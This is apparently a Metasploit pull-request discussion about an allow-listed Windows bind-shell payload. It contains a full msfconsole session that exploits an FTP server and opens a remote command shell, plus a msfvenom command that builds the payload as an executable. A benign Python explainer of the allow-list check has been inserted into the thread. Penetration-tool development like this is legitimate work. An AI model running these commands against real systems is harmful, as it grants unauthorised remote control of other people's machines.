added ACL Bind Shell payload #2981

Closed

@BorjaMerino

Single TCP bind shell with ACL support (only the IP you set will get the shell). It's just an alternative to the classic bind shell. I think it could be useful if you do not want someone else to steal your shell with a simple netcat. I used the shell_bind_tcp of Stephen Fewer and I modified the accept() call to check the client IP (this is an increase of 22 bytes). If the IP is not the one defined in AHOST (Allowed IP), the descriptor is closed and the socket waits for another connection.

I added .asm files, the payload and the respective handler (I used the bind shell handler with a couple of modifications). Let me know if other changes are needed.
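
The accept-time peer check described in the pull request text, as an added Python illustration (not the PR's assembly or handler code) of what a client on each side of the allow-list observes: the TCP connection is accepted either way, so the port looks open to a scan, but a non-allowed peer gets an immediate close with no data. The function names, the greeting and the loopback setup are assumptions made for the demo; the listener here only sends a fixed greeting.

```python
import socket
import threading


def serve_allowed_peer(listener, allowed_ip, greeting=b"hello\n", max_conns=1):
    """Accept up to max_conns connections; send the greeting only to allowed_ip.

    Any other peer has its descriptor closed at once and the loop goes back to
    accept(). Returns a list of (peer_ip, served) decisions.
    """
    decisions = []
    for _ in range(max_conns):
        conn, (peer_ip, _peer_port) = listener.accept()
        with conn:  # closed on exit whether or not the peer was served
            served = peer_ip == allowed_ip
            if served:
                conn.sendall(greeting)
            decisions.append((peer_ip, served))
    return decisions


def probe(allowed_ip):
    """Connect once from 127.0.0.1 to a loopback listener guarding allowed_ip.

    Returns (bytes the client received before EOF, listener decisions).
    """
    listener = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    listener.bind(("127.0.0.1", 0))  # constructed demo endpoint, ephemeral port
    listener.listen(1)
    result = {}
    worker = threading.Thread(
        target=lambda: result.update(
            decisions=serve_allowed_peer(listener, allowed_ip)))
    worker.start()
    chunks = []
    with socket.create_connection(listener.getsockname(), timeout=5) as client:
        while chunk := client.recv(64):  # read until the listener closes
            chunks.append(chunk)
    worker.join(5)
    listener.close()
    return b"".join(chunks), result["decisions"]


if __name__ == "__main__":
    print("allowed peer    :", probe("127.0.0.1"))
    print("non-allowed peer:", probe("10.0.0.100"))
```
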

@OJ
OJ commented Feb 12, 2014

This looks cool! Do you happen to have sample output/demo usage?

Thanks!

@BorjaMerino

@OJ Thank you.
You only have to use AHOST to specify the IP allowed to get the shell (others will be rejected). E.g.:

msf> use exploit/windows/ftp/pcman_stor
msf exploit(pcman_stor) > set rhost 192.168.1.39
rhost => 192.168.1.39
msf exploit(pcman_stor) > set payload windows/shell_acl_bind_tcp
payload => windows/shell_acl_bind_tcp
msf exploit(pcman_stor) > set lport 5041
lport => 5041
msf exploit(pcman_stor) > ifconfig | grep 192
[*] exec: ifconfig | grep 192

          inet addr:192.168.1.33  Bcast:192.168.1.255  Mask:255.255.255.0
msf exploit(pcman_stor) > set ahost 192.168.1.33
ahost => 192.168.1.33
msf exploit(pcman_stor) > exploit

[*] Connecting to FTP server 192.168.1.39:21...
[*] Started ACL bind handler
[*] Connected to target FTP server.
[*] Authenticating as anonymous with password mozilla@example.com...
[*] Sending password...
[*] Trying victim Windows XP SP3 English...
[*] Command shell session 1 opened (192.168.1.33:59686 -> 192.168.1.39:5041) at 2014-02-12 04:49:35 +0100

Microsoft Windows XP [Version 5.1.2600]
(C) Copyright 1985-2001 Microsoft Corp.

C:\Documents and Settings\Test\My Documents\Downloads>

Example with msfvenom:

./msfvenom -p windows/shell_acl_bind_tcp AHOST=10.0.0.100 LPORT=1009 -f exe  > batman.exe

In this case, only 10.0.0.100 will get the shell.

Edit by OJ: Added code format tags

@wvu-r7

I am sad that @BorjaMerino didn't make a cool video with awesome music this time. Perhaps next time. :P

@BorjaMerino

@wvu-r7 xDD Who said that? Stay tuned

@wvu-r7

I love your YouTube videos! :D

@BorjaMerino

Since the single (#3017) and stager (#3394) bind shell approach is an improved version of this shellcode, feel free to refuse this pull request.

@Meatballs1

Closing in favour of #3017 then

@Meatballs1 Meatballs1 closed this Jun 7, 2014